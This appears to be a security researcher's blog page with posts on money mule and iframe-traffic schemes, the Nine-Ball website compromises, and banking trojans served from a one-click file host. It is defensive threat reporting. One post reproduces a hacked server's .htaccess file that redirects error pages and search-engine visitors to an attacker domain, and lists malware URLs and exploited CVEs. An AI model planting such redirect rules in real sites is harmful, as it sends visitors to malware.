Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

phish2

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

installing.cc

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

real host advertisment

advert1

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

  • Share/Bookmark

Nine-Ball followup now with video! Part 2

As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla.

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

  • Share/Bookmark

Nine-Ball followup now with video! Part 1

A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.

Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic :) . I’ve included virus total results, domains involved, etc at the end of the post.

Sit back, relax and enjoy the ride.

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acroat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit

  • Share/Bookmark

Major Report Coming via HostExploit team

It’s been awhile since I posted unfortunately, but it’s not due to a lack of attacks to talk about! :) Some time ago I was approached by the Host Exploit open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together research that led to the McColo, Atrivo and EST domains take downs. Since I’m always trying to get the word out on attacks and threats, the answer was quite obvious.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy :)

  • Share/Bookmark

One Click Hosting Spreads Banking Trojan

While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free or a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

hotlinkfiles.com /files/2607508_gs2zp/eudenoite1.scr
premium.hotlinkfiles.com /files/2619000_idqqh/fotosanexadas.scryh
hotlinkfiles.com /files/2637460_lnqnl/DSC_804.jpg.scr
premium.hotlinkfiles.com /files/2645684_c2awa/fotosanexadas.scr
hotlinkfiles.com /files/2645758_i45ka/DSC_805.jpg.scr

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24×01.hpg.ig.com.br/ree1.html
hxxp://gay24×01.hpg.ig.com.br/ree2.html
hxxp://gay24×02.hpg.ig.com.br/nl2.html
hxxp://gay24×02.hpg.ig.com.br/nl3.html
hxxp://gay24×02.hpg.ig.com.br/nl4.html
hxxp://gay24×02.hpg.ig.com.br/nl5.html
hxxp://gay24×02.hpg.ig.com.br/nl6.html
hxxp://gay24×02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

Portuguese SPAM with malware

  • Share/Bookmark